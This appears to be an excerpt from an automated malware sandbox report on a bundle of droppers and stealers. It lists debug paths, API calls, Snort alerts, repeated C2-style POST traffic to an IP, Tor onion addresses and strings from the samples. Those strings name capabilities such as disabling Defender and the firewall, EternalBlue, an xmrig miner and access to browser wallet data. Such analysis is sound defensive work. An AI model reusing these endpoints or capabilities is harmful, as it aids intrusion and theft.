      Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: JC:\puhovumevaga yilih zoyurukelid\zex70\yifilubava\resusedaf\za.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000000.680884243.0000000000864000.00000002.00020000.sdmp
      Source: Binary string: C:\sawofasiduboh_85-yehasona\dib.pdb source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000000.659045843.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: espexe.pdbn[ source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmp
      Source: Binary string: C:\robudabodag-zokokudile vadugu_haxihus-nehena\67.pdb source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000000.657077859.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: D:\workspace\workspace_c\GjOGoOIgHJEwh52iJ_20\Release\GjOGoOIgHJEwh52iJ_20.pdb, source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmp
      Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: C:\timomamuf\25_t.pdb source: yevbZfdCqR.exe, 00000001.00000003.648989644.0000000005AEF000.00000004.00000001.sdmp, 9PWySv_SmMZ5POEp2PUJ_lbI.exe, 00000004.00000000.656280394.0000000000446000.00000002.00020000.sdmp
      Source: Binary string: \13\TestExeBin\zNoteDebug.pdb source: md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmp
      Source: Binary string: vcruntime140.i386.pdb source: oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1033144305.0000000002434000.00000004.00000001.sdmp
      Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: jfiag3g_gg.exe, 00000021.00000002.969839258.0000000000401000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000024.00000002.970581180.0000000000401000.00000040.00020000.sdmp, jfiag3g_gg.exe, 00000029.00000002.989528470.0000000000401000.00000040.00020000.sdmp
      Source: Binary string: C:\puhovumevaga yilih zoyurukelid\zex70\yifilubava\resusedaf\za.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000000.680884243.0000000000864000.00000002.00020000.sdmp
      Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: ^C:\robudabodag-zokokudile vadugu_haxihus-nehena\67.pdb source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000000.657077859.0000000000489000.00000002.00020000.sdmp
      Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: 9.C:\haguxu-7\gafoyeyi\23 cevecovad-kaciw25\tedibuxiyal.pdb source: ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.967043402.00000000004A9000.00000002.00020000.sdmp
      Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: Unable to locate the .pdb file in this location source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: C:\pohihusuwunegu\gutuna\vepazipal\bowahifevumu_wosojus yavo.pdb source: yevbZfdCqR.exe, 00000001.00000003.645691149.0000000005C3D000.00000004.00000001.sdmp, MQ5u6_H0cs9EUXsesfNpGUNc.exe, 00000007.00000000.657444831.0000000000434000.00000002.00020000.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: The module signature does not match with .pdb signature. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: .pdb.dbg source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: '(EfiGuardDxe.pdbx source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: or you do not have access permission to the .pdb location. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.922594410.0000000003EA5000.00000004.00000001.sdmp
      Source: Binary string: c:\Projects\VS2005\ChromeCookiesView\Release\ChromeCookiesView.pdb source: jfiag3g_gg.exe, 00000017.00000002.728626975.0000000000401000.00000040.00020000.sdmp
      Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp
      Source: Binary string: D:\workspace\workspace_c\GjOGoOIgHJEwh52iJ_20\Release\GjOGoOIgHJEwh52iJ_20.pdb source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmp
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0043C650 lstrlenW,GetFileSizeEx,SetCommState,GetOverlappedResult,GetMenuInfo,GetMenuCheckMarkDimensions,GetMessageTime,GetConsoleAliasesLengthA,SearchPathW,ReleaseActCtx,LoadLibraryW,GlobalFix,GetBinaryTypeW,SetThreadLocale,SetProcessPriorityBoost,EnumResourceNamesW,FreeEnvironmentStringsA,FindFirstFileA,FindNextFileW,CreateDirectoryExW,GetLocalTime,WriteProfileSectionA,GetPrivateProfileStringW,WriteFile,SetVolumeLabelW,BuildCommDCBW,InterlockedExchange,FindResourceExW,AddAtomW,OpenMutexA,WriteConsoleInputW,GetConsoleScreenBufferInfo,SetConsoleTitleW,CopyFileExW,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040A24D __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_004625DE __EH_prolog3_GS,FindFirstFileW,FindNextFileW,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00412D8E _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00404F13 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00412F8E __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00405A45 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00405764 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040A5EA _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: TrafficSnort IDS: 2032349 ET TROJAN GCleaner Downloader Activity M1 192.168.2.4:49819 -> 138.68.187.227:80
      Source: TrafficSnort IDS: 1948 DNS zone transfer UDP 192.168.2.4:63301 -> 198.13.62.186:53
      Creates HTML files with .exe extension (expired dropper behavior)
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: N13eHI1fs1RwfU6rt0L4y8dk.exe.1.dr
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: 2TN3zgIdiOGqjAjNH5Ty3zw9.exe.1.dr
      Found C&C like URL pattern
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 113Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Source: global trafficHTTP traffic detected: POST /base/api/getData.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Content-Length: 133Host: 136.144.41.152
      Found Tor onion address
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: %safter top-level valuebad type in compare: block device requiredbufio: negative countcheckdead: runnable gcommand not supportedconcurrent map writescouldn't download WUPcouldn't elevate selfcouldn't extract depscouldn't get an eventcouldn't get app namecouldn't get usernamecouldn't hide servicecouldn't open logfilecouldn't open processcouldn't open servicecouldn't scan networkcouldn't set app namecouldn't set defendercouldn't set firewallcouldn't stop servicecouldn't write drivercouldn't write packetdecompression failuredefer on system stackelectrum-server.ninjaelectrum.hodlister.coelectrum.mindspot.orgelectrum.qtornado.comelectrum2.villocq.comembedded/Winmon32.sysembedded/Winmon64.sysembedded/bootmgfw.efiembedded/injector.exeexec: already startedfindrunnable: wrong pfortress.qtornado.comgot TI process handlehelicarrier.bauerj.euhttp: Handler timeouthttp: nil Request.URLhttps://sndvoices.comhttps://spolaect.infoimage: unknown formatin string escape codeinvalid JPEG format: invalid named capturekey is not comparablelink has been severednet/http: nil Contextpackage not installedpanic on system stackparse postal code: %wprocess name is emptyread-only file systemreflect.Value.Complexreflect.Value.Pointerreflect.Value.SetUintreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/breakpoint trapunknown address type unknown empty Contextunsupported extensionunsupported type (%T)user defined signal 1user defined signal 2 into Go struct field %SystemRoot%\system32\(?i)"?((?:.?)+\.exe)"?/lib/time/zoneinfo.zip3smoooajg7qqac2y.onion4656612873077392578125Aleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWConvertStringSidToSidWCreateCompatibleBitmapCreateEnvironmentBlockCreateIoCompletionPortDEBUG_HTTP2_GOROUTINESDateline Standard TimeGeorgian Standard TimeGetEnvironmentStringsWGetTimeZoneInformationGlobal\xmrigMUTEX31337Hawaiian Standard TimeInscriptional_ParthianMAX_CONCURRENT_STREAMSMountain Standard TimeNetLocalGroupAddMemberNtWaitForSingleObject
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444\Eternalblue-2.2.0.exe\Eternalblue-2.2.0.xmladdress already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memorycouldn't create devicecouldn't get file infocouldn't register testcouldn't select objectcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to hide app: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://ip-api.com/jsonhttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprocess is created WUPprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Elemreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codeunexpected payload: %swirep: invalid p statewrite on closed bufferzero length BIT STRINGzlib: invalid checksum into Go value of type %s/upload/%s/samples/%s) must be a power of 2
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpString found in binary or memory: %safter top-level valuebad type in compare: block device requiredbufio: negative countcheckdead: runnable gcommand not supportedconcurrent map writescouldn't download WUPcouldn't elevate selfcouldn't extract depscouldn't get an eventcouldn't get app namecouldn't get usernamecouldn't hide servicecouldn't open logfilecouldn't open processcouldn't open servicecouldn't scan networkcouldn't set app namecouldn't set defendercouldn't set firewallcouldn't stop servicecouldn't write drivercouldn't write packetdecompression failuredefer on system stackelectrum-server.ninjaelectrum.hodlister.coelectrum.mindspot.orgelectrum.qtornado.comelectrum2.villocq.comembedded/Winmon32.sysembedded/Winmon64.sysembedded/bootmgfw.efiembedded/injector.exeexec: already startedfindrunnable: wrong pfortress.qtornado.comgot TI process handlehelicarrier.bauerj.euhttp: Handler timeouthttp: nil Request.URLhttps://sndvoices.comhttps://spolaect.infoimage: unknown formatin string escape codeinvalid JPEG format: invalid named capturekey is not comparablelink has been severednet/http: nil Contextpackage not installedpanic on system stackparse postal code: %wprocess name is emptyread-only file systemreflect.Value.Complexreflect.Value.Pointerreflect.Value.SetUintreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/breakpoint trapunknown address type unknown empty Contextunsupported extensionunsupported type (%T)user defined signal 1user defined signal 2 into Go struct field %SystemRoot%\system32\(?i)"?((?:.?)+\.exe)"?/lib/time/zoneinfo.zip3smoooajg7qqac2y.onion4656612873077392578125Aleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWConvertStringSidToSidWCreateCompatibleBitmapCreateEnvironmentBlockCreateIoCompletionPortDEBUG_HTTP2_GOROUTINESDateline Standard TimeGeorgian Standard TimeGetEnvironmentStringsWGetTimeZoneInformationGlobal\xmrigMUTEX31337Hawaiian Standard TimeInscriptional_ParthianMAX_CONCURRENT_STREAMSMountain Standard TimeNetLocalGroupAddMemberNtWaitForSingleObjectPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWSAGetOverlappedResultWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444\Eternalblue-2.2.0.exe\Eternalblue-2.2.0.xmladdress already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memorycouldn't create devicecouldn't get file i
      May check the online IP address of the machine
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exeDNS query: name: ip-api.com
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exeDNS query: name: ip-api.com
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeDNS query: name: iplogger.org
      Performs DNS queries to domains with low reputation
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeDNS query: freeprivacytoolsforyou.xyz
      Source: unknownNetwork traffic detected: IP country count 10
